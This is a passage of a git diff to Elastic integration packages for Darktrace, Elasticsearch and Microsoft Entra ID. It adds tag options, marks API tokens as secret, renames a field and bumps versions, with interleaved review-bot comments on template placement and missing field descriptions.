b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml index c18b3883870..e53246e2920 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml @@ -8,3 +8,7 @@ data_stream: listen_port: 9575 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 4 \ No newline at end of file diff --git a/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml b/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml index a9723624791..8517545ab29 100644 --- a/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml +++ b/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml 
@@ -405,7 +405,7 @@ - name: expiry type: long description: nan - - name: isReferenced + - name: is_referenced type: boolean description: nan - name: name diff --git a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml index 063df1e59b0..de520d458c3 100644 --- a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml +++ b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9573 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml index 81f051da6d4..02d2b21c7a3 100644 --- a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml +++ b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml @@ -60,3 +60,5 @@ data_stream: listen_port: 9573 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml index cc4f6b075d4..16fb080160e 100644 --- a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml +++ b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9576 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/docs/README.md b/packages/darktrace/docs/README.md index 64caf73775f..d53a8e5530f 100644 --- a/packages/darktrace/docs/README.md 
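Review bot: The rename of `isReferenced` to `is_referenced` changes only the mapping; the ingest pipeline that produces `triggered_filters.trigger.tag.isReferenced` is not in this hunk, so confirm it renames the key too, otherwise the value lands in an unmapped field. Saved searches, visualisations or rules that reference the old path stop matching after upgrade, so the darktrace changelog entry (not in view) should call out the field rename explicitly rather than only the version bump. The renamed line also keeps `description: nan`, which is rendered verbatim into the README table in the docs hunk below; replace it with a real sentence, e.g. `description: Whether the tag is referenced by a model.` (wording to confirm against the Darktrace API), or drop the key.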
+++ b/packages/darktrace/docs/README.md @@ -1205,7 +1205,7 @@ An example event for `model_breach_alert` looks as following: | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.data.description | | keyword | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.data.visibility | | keyword | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.expiry | nan | long | -| darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.isReferenced | nan | boolean | +| darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.is_referenced | nan | boolean | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.name | nan | keyword | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.restricted | nan | boolean | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.thid | nan | long | diff --git a/packages/darktrace/manifest.yml b/packages/darktrace/manifest.yml index 94bdbf2ae19..4476d0137c8 100644 --- a/packages/darktrace/manifest.yml +++ b/packages/darktrace/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: darktrace title: Darktrace -version: "1.14.1" +version: "1.16.0" description: Collect logs from Darktrace with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - network_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/darktrace-screenshot.png title: Darktrace Model Breach Alert Dashboard Screenshot @@ -46,11 +46,13 @@ policy_templates: title: Public API Token description: Public API Token. required: true + secret: true - name: private_token type: password title: Private API Token description: Private API Token. required: true + secret: true - name: proxy_url type: text title: Proxy URL 
diff --git a/packages/elasticsearch/changelog.yml b/packages/elasticsearch/changelog.yml index da84429c6ac..0e4f61badab 100644 --- a/packages/elasticsearch/changelog.yml +++ b/packages/elasticsearch/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Add support shard_stats.total_count in node metricset + type: enhancement + link: https://github.com/elastic/integrations/pull/9594 +- version: "1.14.0" + changes: + - description: Add support for tags + type: enhancement + link: https://github.com/elastic/integrations/pull/9028 - version: "1.13.1" changes: - description: Make "Total Storage over time" viz consistent with others by using same sourceField diff --git a/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs index dbb3d8ec36b..383aa3be0b9 100644 --- a/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/audit/manifest.yml b/packages/elasticsearch/data_stream/audit/manifest.yml index 786583575ce..2bdd018b00e 100644 --- a/packages/elasticsearch/data_stream/audit/manifest.yml +++ b/packages/elasticsearch/data_stream/audit/manifest.yml @@ -11,6 +11,12 @@ streams: show_user: true default: - /var/log/elasticsearch/*_audit.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Audit logs description: Collect Elasticsearch audit logs using log input diff --git a/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs index 1b5dbca372f..6d6d9806150 100644 
--- a/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/ccr/manifest.yml b/packages/elasticsearch/data_stream/ccr/manifest.yml index 464aaef5ce3..58b4bd72944 100644 --- a/packages/elasticsearch/data_stream/ccr/manifest.yml +++ b/packages/elasticsearch/data_stream/ccr/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs index 009433c8128..2b63448e9c3 100644 --- a/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/cluster_stats/manifest.yml b/packages/elasticsearch/data_stream/cluster_stats/manifest.yml index 0b844d41710..fa573dc414a 100644 --- a/packages/elasticsearch/data_stream/cluster_stats/manifest.yml +++ b/packages/elasticsearch/data_stream/cluster_stats/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false 
diff --git a/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs index c10163dea79..3a33108473f 100644 --- a/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/deprecation/manifest.yml b/packages/elasticsearch/data_stream/deprecation/manifest.yml index 01ac75f8f1d..0853d005812 100644 --- a/packages/elasticsearch/data_stream/deprecation/manifest.yml +++ b/packages/elasticsearch/data_stream/deprecation/manifest.yml @@ -11,6 +11,12 @@ streams: show_user: true default: - /var/log/elasticsearch/*_deprecation.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Deprecation logs description: Collect Elasticsearch deprecation logs using log input diff --git a/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs index 22a2a68cf87..cf574e56482 100644 --- a/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/enrich/manifest.yml b/packages/elasticsearch/data_stream/enrich/manifest.yml index f19b80cf32c..48f416cfeea 100644 --- a/packages/elasticsearch/data_stream/enrich/manifest.yml 
+++ b/packages/elasticsearch/data_stream/enrich/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs index f1a9a299bf2..3c6d5e09b10 100644 --- a/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/gc/manifest.yml b/packages/elasticsearch/data_stream/gc/manifest.yml index b2d07508e53..171778e451d 100644 --- a/packages/elasticsearch/data_stream/gc/manifest.yml +++ b/packages/elasticsearch/data_stream/gc/manifest.yml @@ -12,6 +12,12 @@ streams: default: - /var/log/elasticsearch/gc.log.[0-9]* - /var/log/elasticsearch/gc.log + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Garbage Collection logs description: Collect Elasticsearch gc logs using log input diff --git a/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs index 788127f47a4..e850f411699 100644 --- a/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} 
diff --git a/packages/elasticsearch/data_stream/index/manifest.yml b/packages/elasticsearch/data_stream/index/manifest.yml index ae8d2db6a04..4bca9d225a1 100644 --- a/packages/elasticsearch/data_stream/index/manifest.yml +++ b/packages/elasticsearch/data_stream/index/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs index 27956a588e5..0fedf2b561f 100644 --- a/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs @@ -18,6 +18,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/index_recovery/manifest.yml b/packages/elasticsearch/data_stream/index_recovery/manifest.yml index 95454d88b25..4cddb483b96 100644 --- a/packages/elasticsearch/data_stream/index_recovery/manifest.yml +++ b/packages/elasticsearch/data_stream/index_recovery/manifest.yml @@ -25,3 +25,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs index 8f9d6eed8f9..0f393a24d48 100644 --- a/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs 
@@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/index_summary/manifest.yml b/packages/elasticsearch/data_stream/index_summary/manifest.yml index 0f309a736b0..6b05eefa1d0 100644 --- a/packages/elasticsearch/data_stream/index_summary/manifest.yml +++ b/packages/elasticsearch/data_stream/index_summary/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs index cb28b8febce..078cd873e71 100644 --- a/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml b/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml index 7c7d10972dd..1cc401080a1 100644 --- a/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml +++ b/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml @@ -19,4 +19,10 @@ streams: description: How often to collect the processor-level metrics. Number between 0 and 1. required: true show_user: true - default: "0.25" \ No newline at end of file + default: "0.25" + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false \ No newline at end of file 
diff --git a/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs index c1ecc3f727d..89e05f43563 100644 --- a/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/ml_job/manifest.yml b/packages/elasticsearch/data_stream/ml_job/manifest.yml index bea3f279107..c877d7256a4 100644 --- a/packages/elasticsearch/data_stream/ml_job/manifest.yml +++ b/packages/elasticsearch/data_stream/ml_job/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs index d48813bc6d5..75446e13686 100644 --- a/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/node/manifest.yml b/packages/elasticsearch/data_stream/node/manifest.yml index 5d314720aae..75eeaad4e19 100644 --- a/packages/elasticsearch/data_stream/node/manifest.yml +++ b/packages/elasticsearch/data_stream/node/manifest.yml 
@@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs index 22540bbc057..45c0d5f3dce 100644 --- a/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/node_stats/fields/fields.yml b/packages/elasticsearch/data_stream/node_stats/fields/fields.yml index e1d8819f115..326f74dd131 100644 --- a/packages/elasticsearch/data_stream/node_stats/fields/fields.yml +++ b/packages/elasticsearch/data_stream/node_stats/fields/fields.yml @@ -4,6 +4,11 @@ - name: indices type: group fields: + - name: shard_stats + type: group + fields: + - name: total_count + type: long - name: bulk type: group fields: diff --git a/packages/elasticsearch/data_stream/node_stats/manifest.yml b/packages/elasticsearch/data_stream/node_stats/manifest.yml index 5797dae7191..6eaf5335793 100644 --- a/packages/elasticsearch/data_stream/node_stats/manifest.yml +++ b/packages/elasticsearch/data_stream/node_stats/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs index b954f53394b..7207c49a0d9 100644 
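Review bot: The new `shard_stats.total_count` field in node_stats/fields/fields.yml has neither a `description` nor a `metric_type`, so it renders as an empty row in the README hunk (`| elasticsearch.node.stats.indices.shard_stats.total_count | | long | |`) while the neighbouring `segments.*` fields carry `gauge`. Add `metric_type: gauge` beneath `type: long`, and a one-line `description:` of what the count covers — presumably the number of shards hosted on the node as reported by the node stats API; confirm before wording it. As far as I can tell a field without a metric type is also not treated as a metric when the data stream runs in time-series mode, which is unlikely to be intended given its siblings.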
--- a/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs @@ -18,6 +18,10 @@ period: {{period}} ssl: {{ssl}} {{/if}} {{#if leaderelection }} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} {{ else }} diff --git a/packages/elasticsearch/data_stream/pending_tasks/manifest.yml b/packages/elasticsearch/data_stream/pending_tasks/manifest.yml index ffd3e9f4980..082aa777f12 100644 --- a/packages/elasticsearch/data_stream/pending_tasks/manifest.yml +++ b/packages/elasticsearch/data_stream/pending_tasks/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs index 698ed7ea9c8..c68619d04ac 100644 --- a/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/server/manifest.yml b/packages/elasticsearch/data_stream/server/manifest.yml index a60316096c5..c366c8870f6 100644 --- a/packages/elasticsearch/data_stream/server/manifest.yml +++ b/packages/elasticsearch/data_stream/server/manifest.yml @@ -11,6 +11,12 @@ streams: show_user: true default: - /var/log/elasticsearch/*_server.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Server logs description: Collect server logs using log input 
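Review bot: In the pending_tasks stream template the `tags:` block is inserted directly after `{{#if leaderelection }}`, so it is rendered only in the leader-election branch; the `{{ else }}` branch of that block lies outside this hunk and, from what is visible, emits no tags. The shard stream template in the next hunk has the mirror problem: the block sits after `{{ else }}`, so tags appear only when leader election is off. Every other stream in this change places the block between the `{{/if}}` that closes the ssl section and `{{#if leaderelection }}`; moving the four lines from `tags:` through `{{/each}}` to that position in both files keeps them consistent and renders tags regardless of branch.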
diff --git a/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs index e1c03081610..906df9fd016 100644 --- a/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs @@ -24,6 +24,10 @@ condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} condition: ${kubernetes_leaderelection.leader} == true {{/if}} {{ else }} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition }} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/shard/manifest.yml b/packages/elasticsearch/data_stream/shard/manifest.yml index aadc08a536d..e93583a0ad7 100644 --- a/packages/elasticsearch/data_stream/shard/manifest.yml +++ b/packages/elasticsearch/data_stream/shard/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs index 809534c4e1e..a5e3b2d457b 100644 --- a/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/slowlog/manifest.yml b/packages/elasticsearch/data_stream/slowlog/manifest.yml index 1f7803346f4..de703082e3c 100644 --- a/packages/elasticsearch/data_stream/slowlog/manifest.yml +++ b/packages/elasticsearch/data_stream/slowlog/manifest.yml 
@@ -12,6 +12,12 @@ streams: default: - /var/log/elasticsearch/*_index_search_slowlog.json - /var/log/elasticsearch/*_index_indexing_slowlog.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Slowlog logs description: Collect Elasticsearch slowlog logs using log input diff --git a/packages/elasticsearch/docs/README.md b/packages/elasticsearch/docs/README.md index c0ed49a195b..efd93aee645 100644 --- a/packages/elasticsearch/docs/README.md +++ b/packages/elasticsearch/docs/README.md @@ -2271,6 +2271,7 @@ An example event for `node_stats` looks as following: | elasticsearch.node.stats.indices.segments.term_vectors.memory.bytes | | long | gauge | | elasticsearch.node.stats.indices.segments.terms.memory.bytes | | long | gauge | | elasticsearch.node.stats.indices.segments.version_map.memory.bytes | | long | gauge | +| elasticsearch.node.stats.indices.shard_stats.total_count | | long | | | elasticsearch.node.stats.indices.store.size.bytes | Total size of the store in bytes. | long | gauge | | elasticsearch.node.stats.indices.store.total_data_set_size.bytes | Total size of shards in bytes assigned to this node including backing data for partially mounted indices. | long | gauge | | elasticsearch.node.stats.ingest.total.count | | long | counter | diff --git a/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json b/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json index af795a06bb0..adcc1f63a16 100644 --- a/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json +++ b/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json @@ -4233,4 +4233,4 @@ } ], "type": "dashboard" -} +} \ No newline at end of file 
diff --git a/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json b/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json index 04ca71292ab..14103996815 100644 --- a/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json +++ b/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json 
@@ -1 +1,22 @@ -{"attributes":{"fieldAttrs":"{\"metricset.name\":{\"count\":6},\"elasticsearch.index.name\":{\"count\":5},\"_index\":{\"count\":9},\"elasticsearch.node.name\":{\"count\":2},\"elasticsearch.shard.source_node.name\":{\"count\":2},\"source_node.name\":{\"count\":2}}","fieldFormatMap":"{}","fields":"[]","name":"ES Stack Monitoring","runtimeFieldMap":"{}","sourceFilters":"[]","timeFieldName":"@timestamp","title":".ds-.monitoring-es-*,.monitoring-es*,.ds-metrics-elasticsearch.stack_monitoring.*","typeMeta":"{}"},"coreMigrationVersion":"8.8.0","created_at":"2023-12-11T09:50:10.352Z","id":"befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9","managed":false,"references":[],"type":"index-pattern","typeMigrationVersion":"8.0.0","updated_at":"2023-12-11T09:50:10.352Z","version":"WzExOCwxXQ=="} +{ + "attributes": { + "fieldAttrs": "{\"metricset.name\":{\"count\":6},\"elasticsearch.index.name\":{\"count\":5},\"_index\":{\"count\":9},\"elasticsearch.node.name\":{\"count\":2},\"elasticsearch.shard.source_node.name\":{\"count\":2},\"source_node.name\":{\"count\":2}}", + "fieldFormatMap": "{}", + "fields": "[]", + "name": "ES Stack Monitoring", + "runtimeFieldMap": "{}", + "sourceFilters": "[]", + "timeFieldName": "@timestamp", + "title": ".ds-.monitoring-es-*,.monitoring-es*,.ds-metrics-elasticsearch.stack_monitoring.*", + "typeMeta": "{}" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-11T09:50:10.352Z", + "id": "befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9", + "managed": false, + "references": [], + "type": "index-pattern", + "typeMigrationVersion": "8.0.0", + "updated_at": "2023-12-11T09:50:10.352Z", + "version": "WzExOCwxXQ==" +} \ No newline at end of file diff --git a/packages/elasticsearch/manifest.yml b/packages/elasticsearch/manifest.yml index c2f709acca2..781bb17a8db 100644 --- a/packages/elasticsearch/manifest.yml +++ b/packages/elasticsearch/manifest.yml 
@@ -1,6 +1,6 @@ name: elasticsearch title: Elasticsearch -version: 1.13.1 +version: 1.15.0 description: Elasticsearch Integration type: integration icons: diff --git a/packages/entityanalytics_entra_id/changelog.yml b/packages/entityanalytics_entra_id/changelog.yml index c547b8c13ad..8bab2d9c91c 100644 --- a/packages/entityanalytics_entra_id/changelog.yml +++ b/packages/entityanalytics_entra_id/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml b/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml index 22548aadfc5..42b8db3fdb0 100644 --- a/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml +++ b/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml @@ -19,6 +19,7 @@ streams: type: password title: Secret (API Key) required: true + secret: true - name: dataset type: select title: Dataset diff --git a/packages/entityanalytics_entra_id/manifest.yml b/packages/entityanalytics_entra_id/manifest.yml index ddaa13afdca..6e5314f27e6 100644 --- a/packages/entityanalytics_entra_id/manifest.yml +++ b/packages/entityanalytics_entra_id/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: entityanalytics_entra_id title: "Microsoft Entra ID Entity Analytics" -version: "1.0.1" +version: "1.1.0" description: "Collect identities from Microsoft Entra ID (formerly Azure Active 